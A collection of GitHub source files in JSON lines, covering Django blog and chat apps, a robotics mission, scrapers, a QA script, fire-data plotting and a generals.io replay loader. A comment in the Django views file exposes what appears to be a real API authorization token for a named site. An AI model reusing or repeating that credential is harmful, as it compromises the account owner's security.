Alembic - please adjust! ###\n op.drop_constraint(None, 'keyboards', type_='foreignkey')\n op.drop_column('keyboards', 'creator_id')\n # ### end Alembic commands ###\n","repo_name":"Kei-Eff/guided_side_app","sub_path":"migrations/versions/7557320529cc_added_one_to_many_relationship.py","file_name":"7557320529cc_added_one_to_many_relationship.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18051474466","text":"import json\nfrom channels.consumer import AsyncConsumer\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer,WebsocketConsumer\nfrom asgiref.sync import async_to_sync\n\nclass ChatRoomConsumer(WebsocketConsumer):\n def websocket_connect(self,event):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'room_%s'%self.room_name\n\n async_to_sync (self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n self.accept()\n \n print('room name:',self.room_group_name)\n print('channel name:',self.channel_name)\n \n #message to room\n def websocket_receive(self, event):\n message = event['text'].split(':')\n username = message[2]\n username = username[1:len(username)-2]\n message = message[1].split(',')[0]\n message = message[1:len(message)-1]\n print('message:',message)\n \n async_to_sync (self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'websocket_message',\n \"message\": message,\n 'username': username,\n }\n )\n #message to websocket\n def websocket_message(self, event):\n message = event['message']\n username = event['username']\n\n self.send(text_data=json.dumps({\n 'type': 'websocket.send',\n 'message': message,\n 'username': username,\n }))\n\n print('chatroom_message:',event)","repo_name":"dewanshiPaul/VideoChat-app","sub_path":"VideoChat/base/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8187615690","text":"from pybricks import ev3brick as brick\nfrom pybricks.tools import print, wait, StopWatch\nfrom pybricks.parameters import Stop\nfrom sandwichbot import SandwichBot\n\nclass TrafficMission():\n \"\"\"\n Class to lift traffic module.\n \"\"\"\n IMAGE_PATH = \"assets/swing.jpg\"\n\n def __init__(self, bot:SandwichBot):\n self.image_path = TrafficMission.IMAGE_PATH\n self.bot = bot\n\n def run(self):\n brick.sound.beep()\n self.bot.attachment_motor.reset_angle(0)\n self.bot.drive_distance(1000, 200)\n brick.sound.beep(1000,150,50)\n\n # move arm up while driving to swing\n self.bot.attachment_motor.run_angle(360*3, -1300, Stop.BRAKE, False)\n\n self.bot.drive_distance(900, 100)\n brick.sound.beep(1000,150,50)\n self.bot.drive_distance(-300, 100)\n\n # move arm further up for elevator\n self.bot.attachment_motor.run_angle(360*3, -600, Stop.BRAKE, False)\n\n # head to elevator and side chop\n self.bot.turn_to(-70)\n self.bot.drive_distance(750, 100)\n self.bot.drive_time(-300,300,500)\n brick.sound.beep(1000,150,50)","repo_name":"Team-Sandwich/LineFollowing","sub_path":"missions/traffic_mission.py","file_name":"traffic_mission.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31434716736","text":"\ndef word_count(str):\n counts = dict()\n words = str.split()\n\n for word in words:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n\n return counts\n \nprint( word_count('Falar é fácil. Mostre-me o código'+'É fácil escrever código. Difícil é escrever código que funcione'))\n","repo_name":"AnaCarolinaMoreira/Vetor-de-Palavras","sub_path":"foo4.py","file_name":"foo4.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24630060463","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom django.db.models import Count\nfrom taggit.models import Tag\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\nfrom .forms import BlogPostModelForm\nfrom .models import BlogPost\n\nfrom taggit.models import Tag\n\nfrom .serializers import SnippetSerializer, UserSerializer\nfrom rest_framework import generics ,permissions \nfrom django.contrib.auth.models import User\nfrom .permissions import IsOwnerOrReadOnly\nfrom rest_framework.decorators import api_view # new\nfrom rest_framework.response import Response # new\nfrom rest_framework.reverse import reverse # new\nfrom rest_framework.permissions import IsAuthenticated\n\n\ndef blog_post_list_view(request, tag_slug=None):\n\n qs = BlogPost.objects.all().published() \n \n tag = None\n \n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n qs = qs.filter(tags__in=[tag])\n paginator = Paginator(qs, 5) # 5 posts in each page \n \n \n page = request.GET.get('page') \n try: \n qs = paginator.page(page) \n except PageNotAnInteger: \n # If page is not an integer deliver the first page \n qs = paginator.page(1) \n except EmptyPage: \n # If page is out of range deliver last page of results\n qs = paginator.page(paginator.num_pages)\n \n\n #if request.user.is_authenticated:\n # my_qs = BlogPost.objects.filter(user=request.user)\n # qs = (qs | my_qs).distinct()\n template_name = 'blog/list.html'\n context = {'page': page,'object_list': qs,'tag': tag}\n return render(request, template_name, context) \n\ndef blog_post_detail_view(request, slug):\n \n obj = get_object_or_404(BlogPost, slug=slug)\n template_name = 'blog/detail.html'\n \n post_tags_ids = obj.tags.values_list('id', flat=True)\n \n similar_posts = BlogPost.objects.all().published().filter(tags__in=post_tags_ids)\\\n .exclude(id=obj.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags'))\\\n .order_by('-same_tags',)[:4]#'-publish'\n\n context = {\"object\": obj, \"similar_posts\": similar_posts}\n\n\n\n return render(request, template_name, context) \n\n\n\n\n\n\n\n\n\n\n\n# @login_required\n@staff_member_required\ndef blog_post_create_view(request):\n\n form = BlogPostModelForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.user = request.user\n obj.save()\n form = BlogPostModelForm()\n template_name = 'form.html'\n context = {'form': form}\n return render(request, template_name, context) \n\n\n\n\n\n\n@staff_member_required\ndef blog_post_update_view(request, slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n form = BlogPostModelForm(request.POST or None, instance=obj)\n if form.is_valid():\n form.save()\n template_name = 'form.html'\n context = {\"title\": f\"Update {obj.title}\", \"form\": form}\n return render(request, template_name, context) \n\n\n@staff_member_required\ndef blog_post_delete_view(request, slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n template_name = 'blog/delete.html'\n if request.method == \"POST\":\n obj.delete()\n return redirect(\"/blog\")\n context = {\"object\": obj}\n return render(request, template_name, context) \n\n\n\n@api_view(['GET'])\ndef api_root(request, format=None):\n return Response({\n 'users': reverse('blog:user-list', request=request, format=format),\n 'snippets': reverse('blog:snippet-list', request=request, format=format)\n \n })\n\nclass SnippetList(generics.ListCreateAPIView):\n queryset = BlogPost.objects.all()\n serializer_class = SnippetSerializer\n def perform_create(self, serializer): # new\n serializer.save(owner=self.request.user)\n\nclass SnippetDetail(generics.RetrieveUpdateDestroyAPIView):\n queryset = BlogPost.objects.all()\n serializer_class = SnippetSerializer\n#For token auth python manage.py drf_create_token vitor\n#will need https://www.technozod.com/blog/api/snippets/38/ 'Authorization: Token c5c7148ecae080a1122a6b1d2372ca0443077d6a'\n#permission_classes = (IsAuthenticated,) \n #permission_classes = (permissions.IsAuthenticatedOrReadOnly,)\n permission_classes = (permissions.IsAuthenticatedOrReadOnly,\n IsOwnerOrReadOnly,)\n \nclass UserList(generics.ListAPIView): # new\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass UserDetail(generics.RetrieveAPIView): # new\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n \n","repo_name":"ubermachine/deployedblog","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4248810093","text":"from typing import Any\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\n\nclass DataGenerator:\n \"\"\"\n A common base for all generators of testdata\n \"\"\"\n first_names = [\"Eva\", \"Mark\", \"Jonathan\", \"Christine\", \"Sebatian\", \"Ava\",\n \"Blake\", \"Andrea\", \"Joanne\", \"Frank\", \"Emma\", \"Ruth\", \"Leah\",\n \"Jacob\", \"Megan\", \"Richard\", \"Piers\", \"Felicity\", \"Melanie\",\n \"Max\", \"Maria\", \"Anne\", \"Anne\", \"Charles\", \"Jacob\"]\n last_names = [\"Andrews\", \"Hayes\", \"Martinez\", \"Evans\", \"Pratt\", \"Vaughan\",\n \"Roberts\", \"Forsyth\", \"Walker\", \"Baker\", \"Avery\", \"Davidson\",\n \"Wilkins\", \"Morrison\", \"Ball\", \"Paige\", \"Gray\", \"Marshall\",\n \"Langdon\", \"McLean\", \"James\", \"Anderson\", \"Clark\", \"Henderson\",\n \"Scott\"]\n emails = [\"gmail.com\", \"outlook.com\", \"yahoo.com\", \"hotmail.com\"]\n\n def __init__(self, session: AsyncSession):\n \"\"\"\n Initializes the data list and assigns the session to use.\n\n :param session: The session to use to add the data to the database\n :type session: AsyncSession\n \"\"\"\n self.data: list[Any] = []\n self.session: AsyncSession = session\n\n def add_to_db(self) -> None:\n \"\"\"\n Adds the entirety of the data list to the database. No commit is done.\n\n :return: None\n \"\"\"\n self.session.add_all(self.data)\n","repo_name":"SELab-2/OSOC-4","sub_path":"backend/app/tests/utils_for_tests/DataGenerator.py","file_name":"DataGenerator.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27954193052","text":"#coding:utf-8\n\nclass Option():\n \"\"\"\n 定义指令中的命令参数\n \"\"\"\n def __init__(self,names,hasValue=0):\n \"\"\"\n names 字符串/列表/元组 形如[\"-a\",\"-A\",\"--aAa\"]\\n\n hasValue 整数 0为不需要值 1为需要值 2为尽可能有值\n \"\"\"\n if isinstance(names,str):\n names=[names]\n self.names=names\n self.hasValue=hasValue\n\n def __str__(self):\n return \"/\".join(self.names)\n\n __repr__=__str__\n\n def isLongOrShort(self):\n \"\"\"\n 返回整数 0为短 1为长 2为短或长\n \"\"\"\n hasShort=False\n hasLong=False\n for n in self.names:\n per=n[:2]\n if per==\"--\":\n hasLong=True\n elif per.startswith(\"-\"):\n hasShort=True\n if hasLong and hasShort:\n return 2\n if hasShort:\n return 0\n elif hasLong:\n return 1\n else:\n raise Exception(\"%s是无效的opt\"%str(self))\n \n def isMatch(self,t):\n for n in self.names:\n if t.startswith(n):\n return True\n return False\n\nclass CommandParser():\n '''\n 用来处理一行指令\\n\n 例: .cmd param1 param2 -s1 -s2 s2val --l lval1 lval2 lval3\n '''\n #text=\"\"\n #command={}\n commandPrefix=[\".\",\"。\",\"-\",\"!\",\"!\",\"/\"]\n #special=[]\n #cons=[]\n def __init__(self):\n self.command={}\n self.shortspecial=[]\n self.longspecial=[]\n #self.special=[]\n self.cons=[]\n self.raw=\"\"\n\n def __getitem__(self,key):\n return self.command.get(key,None)\n\n @staticmethod\n def isCommand(t):\n temp=t.lstrip()\n if t==\"\":\n return False\n return temp[0] in CommandParser.commandPrefix\n\n def addSpecial(self,option):\n sl=option.isLongOrShort()\n if sl==0:\n self.shortspecial.append(option)\n elif sl==1:\n self.longspecial.append(option)\n elif sl==2:\n self.shortspecial.append(option)\n self.longspecial.append(option)\n\n def setSpecial(self,s):\n for option in s:\n self.addSpecial(option)\n #self.special=s\n\n def hasSpecial(self):\n return len(self.shortspecial)!=0 or len(self.longspecial)!=0\n\n def opt(self,names,hasValue=0):\n option=Option(names,hasValue)\n self.addSpecial(option)\n return self\n\n def getCommand(self,t):\n if t==\"\":\n return False\n r=CommandParser.isCommand(t)\n if r:\n self.cons=t.strip().split()\n self.command[\"type\"]=self.cons[0][0]\n self.command[\"command\"]=self.cons[0][1:]\n self.raw=t\n if self.command[\"command\"]==\"\":\n return False\n return r\n \n def separateCommand(self,cmd):\n if self.command[\"command\"].startswith(cmd):\n return self.command[\"command\"][len(cmd):]\n return None\n \n def parse(self,s=()):\n self.setSpecial(s)\n self.command[\"params\"]=[]\n con=self.cons[1:]\n if not self.hasSpecial():\n self.command[\"params\"]=con\n return\n while len(con)!=0:\n if not con[0].startswith(\"-\"):\n self.command[\"params\"].append(con[0])\n con=con[1:]\n else:\n matched=False\n if con[0].startswith(\"--\"):\n for ls in self.longspecial:\n if ls.isMatch(con[0]):\n matched=True\n opt=con[0].lstrip(\"-\")\n con=con[1:]\n if ls.hasValue>0:\n self.command[opt]=[]\n while len(con)!=0 and not con[0].startswith(\"-\"):\n self.command[opt].append(con[0])\n con=con[1:]\n if ls.hasValue==2 and len(self.command[opt])==0:\n self.command[opt]=True\n else:\n self.command[opt]=True\n break\n else:\n for ss in self.shortspecial:\n if ss.isMatch(con[0]):\n matched=True\n opt=con[0].lstrip(\"-\")\n con=con[1:]\n if ss.hasValue==0 or len(con)==0 or (ss.hasValue==2 and con[0].startswith(\"-\") ):\n self.command[opt]=True\n else:\n self.command[opt]=con[0]\n con=con[1:]\n break\n if not matched:\n self.command[\"params\"].append(con[0])\n con=con[1:]\n '''\n flag=self.hasSpecial()\n isSpecial=False\n isLongSp=None\n for x in range(len(con)):\n if con[x][0]==\"-\" and flag and con[x].lstrip(\"-\") in self.special:\n isLongSp=None\n if con[x].startswith(\"--\"):\n isLongSp=con[x].lstrip(\"-\")\n self.command[isLongSp]=[]\n elif x+1 4:\n score -= 1 \n if company_exists:\n score -= 1 \n score = max(score, 1)\n\n # create a new JobOffer\n new_offer = JobOffer(\n provider=provider,\n url=url,\n title=offer.title,\n description=description,\n author=offer.author,\n company=information.company_name if information.company_name else \"\",\n date=offer.date,\n score=score,\n positives=\";\".join(categories.positive),\n negatives=\";\".join(categories.negative),\n positive_keywords=\";\".join(keywords.green_flag_keywords),\n negative_keywords=\";\".join(keywords.red_flag_keywords),\n email_text='EmailText',\n website_copy=offer.screenshot,\n )\n\n db.add(new_offer)\n db.commit()\n\n print(offer.title, categories, keywords, information)\n\n","repo_name":"KrysiaEK/FakeJobsFinder","sub_path":"backend/app/app/worker/web_scrapper.py","file_name":"web_scrapper.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37911090795","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymysql\nimport logging\nimport pymysql.cursors\nfrom twisted.enterprise import adbapi\nlogger = logging.getLogger(__name__)\n\n\nclass AppcommentsspiderPipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls, settings):\n \"\"\"\n 载入数据库的配置\n :param settings:\n :return:\n \"\"\"\n dbparms = dict(\n host=settings[\"MYSQL_HOST\"],\n db=settings[\"MYSQL_DBNAME\"],\n user=settings[\"MYSQL_USER\"],\n passwd=settings[\"MYSQL_PASSWORD\"],\n charset='utf-8',\n cursorclass=pymysql.cursors.DictCursor,\n use_unicode=True,\n )\n dbpool = adbapi.ConnectionPool(\"MySQLdb\", **dbparms)\n return cls(dbpool)\n\n \"\"\"\n Item Pipeline意为项目管道,当生成Item后,它会自动被送到Item Pipeline进行处理,\n 常用它来做的操作:清理HTML数据;验证爬取数据,检查爬取字段;查重并丢弃重复内容;将爬取结果储存到数据库。\n 要实现一个Item Pipeline,只需要定义一个类并实现process_item方法即可,\n 启用后,Item Pipeline会自动调用这个方法,这个方法必须返回包含数据的字典或是Item对象,或者抛出DropItem异常。\n \"\"\"\n def process_item(self, item, spider):\n \"\"\"\n 使用twisted将mysql插入变成异步执行\n :param item:\n :param spider:\n :return:\n \"\"\"\n for field in item.fields:\n item.setdefault(field, '')\n query = self.dbpool.runInteraction(self.do_insert, item)\n # 处理异常\n query.addErrback(self.handle_error, item, spider)\n\n def handle_error(self, failure, item, spider):\n # log中写入异步插入的异常\n logging.error(failure)\n\n def do_insert(self, cursor, item):\n \"\"\"\n 执行具体的插入\n 根据不同的item构建不同的sql语句并插入���mysql中\n :param cursor:\n :param item:\n :return:\n \"\"\"\n insert_sql, params = item.get_insert_sql()\n cursor.execute(insert_sql, params)\n\n","repo_name":"490/app_comments_spider-master","sub_path":"AppCommentsSpider/AppCommentsSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40854983821","text":"import numpy as np\r\nimport re\r\nimport jieba\r\nimport jieba.analyse\r\nimport sys\r\nimport math\r\nfrom gensim.models import Word2Vec\r\nimport json\r\n# from keras.preprocessing import sequence \r\n# from keras.optimizers import SGD, RMSprop, Adagrad \r\n# from keras.utils import np_utils \r\n# from keras.models import Sequential \r\n# from keras.layers.core import Dense, Dropout, Activation \r\n# from keras.layers.embeddings import Embedding \r\n# from keras.layers.recurrent import LSTM, GRU \r\nfrom keras.models import load_model\r\n\r\n\r\ndef spiltword(sentencelist):\r\n wordlist = []\r\n # print('\\nSplitting word\\n')\r\n for index, storage in enumerate(sentencelist):\r\n wordsplit = list(jieba.cut(storage, cut_all=False))\r\n wordlist.append(wordsplit)\r\n return wordlist\r\n\r\n\r\ndef turnwordtovector(wordlist):\r\n # print('\\nLoading word2vec model...\\n')\r\n model = Word2Vec.load('Word60.model')\r\n # print('\\nTurning word to vector\\n')\r\n vectorlist = []\r\n for index, data in enumerate(wordlist):\r\n tmp = []\r\n for item in data:\r\n if item in model.vocab:\r\n tmp.append(model[item].tolist())\r\n vectorlist.append(tmp)\r\n # progressbar(index,len(wordlist))\r\n return vectorlist\r\n\r\ndef ifSimilar(vec1,vec2):\r\n num = float(np.sum(vec1 * vec2)) # 若为行向量则 A * B.T  \r\n denom = np.linalg.norm(vec1) * np.linalg.norm(vec2)\r\n if denom == 0:\r\n return 0\r\n cos = num / denom # 余弦值  \r\n sim = 0.5 + 0.5 * cos # 归一化  \r\n return sim\r\n\r\n\r\ndef loaddata():\r\n f = open('baike.txt', 'r', encoding='utf-8')\r\n r = f.read()\r\n # print(r[0])\r\n data = re.sub(r'\\s+', ' ', r)\r\n data = re.split('[!?。;;!?]', data)\r\n model = load_model('0.608113.h5')\r\n return data, model\r\n '''\r\n f2=open('baike-process.txt','w')\r\n f2.write(str(data))\r\n f2.close()\r\n '''\r\n\r\n\r\n# print(data[0:10])\r\ndef getanswer(question, data, model):\r\n vec_model = Word2Vec.load('Word60.model')\r\n seg_list = jieba.lcut_for_search(question)\r\n print(seg_list)\r\n numberofpossibleanswer = 5\r\n cntlist = []\r\n ####################################\r\n #第一步删选\r\n for index, item in enumerate(data):\r\n cnt = 0\r\n for item2 in seg_list:\r\n\r\n if item2 in vec_model.vocab:\r\n vec1 = vec_model[item2].tolist()\r\n sentence = jieba.lcut_for_search(item)\r\n for item3 in sentence:\r\n if item3 in vec_model.vocab:\r\n vec2 = vec_model[item3].tolist()\r\n sim=ifSimilar(np.array(vec1), np.array(vec2))\r\n if sim>0.9:\r\n if item2 != item3:\r\n cnt = cnt+sim**10\r\n continue\r\n if item2 in item:\r\n cnt = cnt + 1\r\n if len(item)!=0:\r\n cntlist.append(cnt/len(item)**0.3)\r\n else:\r\n cntlist.append(0)\r\n ###############################\r\n\r\n\r\n cntarray = np.array(cntlist)\r\n indexlist = np.argsort(cntarray)\r\n indexlist = indexlist.tolist()\r\n indexlist.reverse()\r\n sentencelist = []\r\n answerlist = []\r\n\r\n ##########################\r\n #适当切分再删选\r\n for i in range(numberofpossibleanswer):\r\n if ',' in data[indexlist[i]] or ',' in data[indexlist[i]]:\r\n tmp = re.findall(r'(?<=[,\\^,\\s])(?=([^,,\\s]+[,,\\s][^,,\\s]+))',data[indexlist[i]])\r\n else:\r\n tmp=data[indexlist[i]]\r\n for item in tmp:\r\n if len(item)>=3:\r\n sentencelist.append(question + item)\r\n if ',' in item or ',' in item:\r\n a=re.split('[,,]',item)\r\n for item2 in a:\r\n if question+item2 not in sentencelist:\r\n words1,words2=jieba.lcut_for_search(question),jieba.lcut_for_search(item2)\r\n for word1 in words1:\r\n if word1 in words2:\r\n sentencelist.append(question +item2)\r\n sentencelist=list(set(sentencelist))\r\n #########################\r\n wordlist = spiltword(sentencelist)\r\n vectorlist = turnwordtovector(wordlist)\r\n xa = np.zeros((len(vectorlist), 30, 60), dtype='float64')\r\n for index1, items in enumerate(vectorlist):\r\n for index2, item2 in enumerate(items):\r\n if index2 == 30:\r\n break\r\n xa[index1][index2] = item2\r\n result = model.predict(xa)\r\n # print(result)\r\n tmp = []\r\n for i in range(len(vectorlist)):\r\n tmp.append(result[i][0])\r\n result = np.array(tmp)\r\n result = np.argsort(result)\r\n result = result.tolist()\r\n result.reverse()\r\n # print(data[indexlist[result[0]]])\r\n return '\\n'.join([sentencelist[i] for i in result][0:2])\r\n '''\r\n for i in range(numberofpossibleanswer):\r\n print('\\n')\r\n print(tmp[result[i]])\r\n print(data[indexlist[result[i]]])\r\n '''\r\n\r\n\r\ndef main():\r\n data, model = loaddata()\r\n questionlist = ['贵校的现任校长是谁?', '贵校建校在哪一年?', '贵校有多少本科专业?', '贵校校歌是什么?', '贵校坐落于哪座城市/省份?', '贵校有多少名工程院院士?',\r\n '贵校有多少学院?', '贵校总的科研经费是多少?']\r\n for question in questionlist:\r\n print('\\n')\r\n print(question)\r\n print(getanswer(question, data, model))\r\n # wordsplit=list(jieba.cut(question,cut_all=False))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"crh19970307/BOP2017","sub_path":"script/other/question-answer-v2.py","file_name":"question-answer-v2.py","file_ext":"py","file_size_in_byte":5667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"18600508425","text":"import re\nfrom pathlib import Path\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nsns.set_theme(context='paper', style='whitegrid', font='Arimo')\nfacecolor = '#f8f5f0'\n\ndata_dir = Path(__file__).parents[1] / 'data'\nfig_dir = Path(__file__).parents[1] / 'figures'\n\nfig_dir.mkdir(exist_ok=True)\n\ncalls_path = data_dir / 'DP-fire_service_calls.csv.gz'\ninc_path = data_dir / 'DP-nm_incidents.csv.gz'\ncom_path = data_dir / 'DP-fire_safety_complaints.csv.gz'\n\ndf_calls = pd.read_csv(calls_path)\ndf_inc = pd.read_csv(inc_path)\ndf_com = pd.read_csv(com_path)\n\n#\n# create and save Call Type Count figure\nct_count = df_calls['Call Type'].value_counts()\n\nct_count_nm = ct_count.drop('Medical Incident')\nother_count = ct_count_nm.tail(-10).sum()\nct_count_top10 = ct_count_nm.head(10)\nct_count_top10.at['Other'] = ct_count_top10.at['Other'] + other_count\nct_count_top10 = ct_count_top10.sort_values(ascending=False)\n\nprint(f\"Total number of calls: {ct_count.sum()}\")\nprint(f\"Number of medical incidents: {ct_count['Medical Incident']}\")\nprint(f\"Number of top 10 call types (no medical incidents): {ct_count_top10.sum()}\")\n\n#print(ct_count_top10)\n\nplt.figure(facecolor=facecolor)\nsns.barplot(x=ct_count_top10.values, y=ct_count_top10.index, palette='flare')\nplt.savefig(fig_dir / 'call_type_counts.svg', bbox_inches='tight')\n\n#\n# Create and save Situation and Response count as given by the dataset of \n# \"Fire Incidents\".\n#\n# \"Fire Incidents\" are defined by non-medical incidents (but still includes\n# emergency incidents), as reported in the open data portal. The incident \n# numbers in this dataset occur in the Fire Service Calls dataset, and is \n# effectively a subset.\nprint(f\"Total number of (non-medical) incidents: {len(df_inc)}\")\n\ns_count = df_inc['Situation Summary'].value_counts()\nr_count = df_inc['Response Summary'].value_counts()\n\n#print(s_count)\n#print(r_count)\n\nplt.figure(facecolor=facecolor)\nsns.barplot(x=s_count.values, y=s_count.index, palette='flare')\nplt.savefig(fig_dir / 'nm_situation_counts.svg', bbox_inches='tight')\n\nplt.figure(facecolor=facecolor)\nsns.barplot(x=r_count.values, y=r_count.index, palette='flare')\nplt.savefig(fig_dir / 'nm_response_counts.svg', bbox_inches='tight')\n\n#\n# create and save Complaint Type Count figure\nprint(f\"Total number of fire safety complaints: {len(df_com)}\")\n\nc_count = df_com['Complaint Type'].value_counts()\n\n#print(c_count)\n\nplt.figure(facecolor=facecolor)\nax = sns.barplot(x=c_count.values, y=c_count.index, palette='flare')\nplt.savefig(fig_dir / 'complaint_type_counts.svg', bbox_inches='tight')\n","repo_name":"mneyrane/SF-fire-analysis","sub_path":"02-analysis/plot_counts.py","file_name":"plot_counts.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14022123047","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 23 06:23:13 2017\n\n@author: ty\n\"\"\"\n\nimport datetime\nimport os\nimport pandas\nimport sys\n\nimport h5py\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport math\nimport json\nimport time\nimport traceback\nimport game as generals_game\nimport random\nimport generals_map\nfrom bot_TNT import MAP_CHANNELS, update_state, generate_blank_state, pad, pretty_print\nfrom game import MAX_MAP_WIDTH, ORIGINAL_MAP_WIDTH, NUM_DIRECTIONS, NORTH, EAST, SOUTH, WEST\n\n\nimport multiprocessing\n\nMATCH_ID_REQUEST = 'http://halite.io/api/web/game?userID={}&limit={}'\nREPLAY_REQUEST = 'https://s3.amazonaws.com/halitereplaybucket/{}'\n\nMIN_REPLAY_STARS = 100\ntest = 0\n\n\ndef move_to_direction(game, move):\n start_y, start_x = game.index_to_coordinates(move['start'])\n end_y, end_x = game.index_to_coordinates(move['end'])\n return coordinates_to_direction(start_y, start_x, end_y, end_x)\n\ndef coordinates_to_direction(start_y, start_x, end_y, end_x):\n direction = NORTH\n \n if end_x - start_x == 1:\n direction = EAST\n elif end_x - start_x == -1:\n direction = WEST\n elif end_y - start_y == 1:\n direction = SOUTH\n \n return direction\n\ndef generate_target_move(game, move):\n is50 = int(move['is50'])\n start_y, start_x = game.index_to_coordinates(move['start'])\n end_y, end_x = game.index_to_coordinates(move['end'])\n return generate_target(game, start_y, start_x, end_y, end_x)\n \ndef generate_target(game, start_y, start_x, end_y, end_x):\n direction = NORTH\n \n if end_x - start_x == 1:\n direction = EAST\n elif end_x - start_x == -1:\n direction = WEST\n elif end_y - start_y == 1:\n direction = SOUTH\n \n pad_x = math.ceil(float(ORIGINAL_MAP_WIDTH - game.gmap.width) / 2.0)\n pad_y = math.ceil(float(ORIGINAL_MAP_WIDTH - game.gmap.height) / 2.0)\n return np.array([start_y + pad_y, start_x + pad_x, direction, game.gmap.height, game.gmap.width, 0, game.turn])\n\ndef generate_target_tensors(x, y, direction):\n tile_choice = np.zeros((ORIGINAL_MAP_WIDTH, ORIGINAL_MAP_WIDTH))\n direction_target = np.zeros((ORIGINAL_MAP_WIDTH, ORIGINAL_MAP_WIDTH, NUM_DIRECTIONS))\n \n tile_choice[int(y), int(x)] = 1\n direction_target[int(y), int(x), int(direction)] = 1\n \n return tile_choice.flatten(), direction_target.flatten()\n\ndef load_replay(replayFolder, replay_name):\n return json.load(open('{}/{}'.format(replayFolder,replay_name)))\n\ndef load_replays(threadId, replayFolder, replayNames, file_name, lock, validation_ratio=0.1):\n print(\"Initializing thread {} for loading {} files!\".format(threadId, len(replayNames)))\n start_time = time.time()\n \n for index, replay_name in replayNames:\n try:\n print('Loading {} on thread {} ({}/{}) with utilization in {} seconds'.format(replay_name, \n threadId, index, len(replayNames), time.time() - start_time))\n \n # Load replay JSON file\n replay = load_replay(replayFolder, replay_name)\n \n # Load relevant details from replay JSON file\n map_width = replay['mapWidth']\n map_height = replay['mapHeight']\n cities = replay['cities']\n cityArmies = replay['cityArmies']\n generals = replay['generals']\n mountains = replay['mountains']\n moves= replay['moves']\n afks = replay['afks']\n version = replay['version']\n players = replay['usernames']\n player_count = len(players)\n \n # Skip games that are not 1v1\n if player_count > 2:\n print(\"Skipping non-1v1 game...\")\n continue\n \n # Skip games that does not contain at least one player of atleast MIN_REPLAY_STARS\n if max(replay['stars']) < MIN_REPLAY_STARS:\n print(\"Skipping game because stars are too low...\")\n continue\n \n # Skip games with a player that quits\n if len(afks) > 0:\n print(\"Skipping game with AFK player in...\")\n continue\n \n # Initialize a Game object with starting state and players\n game = generals_game.Game.from_replay(replay, version)\n game_states = [generate_blank_state(), generate_blank_state()]\n oracle_states = [generate_blank_state(), generate_blank_state()]\n replay_inputs = [[], []]\n replay_targets = [[], []]\n last_moves = [None, None]\n \n moves_count = len(moves)\n move_index = 0\n print(\"Beginning simulation...\")\n while not game.is_over():\n if move_index >= moves_count:\n break\n # Generate the current game state from the perspective of player with target_id index\n target_moves = [None, None]\n map_states = [game.generate_state(0), game.generate_state(1)]\n map_oracle_states = [game.generate_state(0, True), game.generate_state(1, True)]\n \n # Submit all moves and simulate the game state from replay\n while move_index < moves_count and moves[move_index]['turn'] <= game.turn:\n move = moves[move_index]\n move_index += 1\n player = move['index']\n start = move['start']\n end = move['end']\n is50 = move['is50']\n success = game.handle_attack(player, start, end, is50)\n target_moves[player] = move\n \n # Kill and remove AFK players from the game simulation\n if len(afks) > 0 and afks[0]['turn'] == game.turn:\n game.kill_player(afks[0]['index'])\n \n # Add the state to training data if warranted\n for i in range(2):\n enemy = 0 if i == 1 else 1\n \n target_move = target_moves[i]\n \n # Initialize and update oracle state\n oracle_tiles, oracle_armies, oracle_cities, oracle_generals = map_oracle_states[i]\n oracle_tiles = oracle_tiles.reshape(map_height, map_width)\n oracle_armies = oracle_armies.reshape(map_height, map_width)\n enemy_stats = 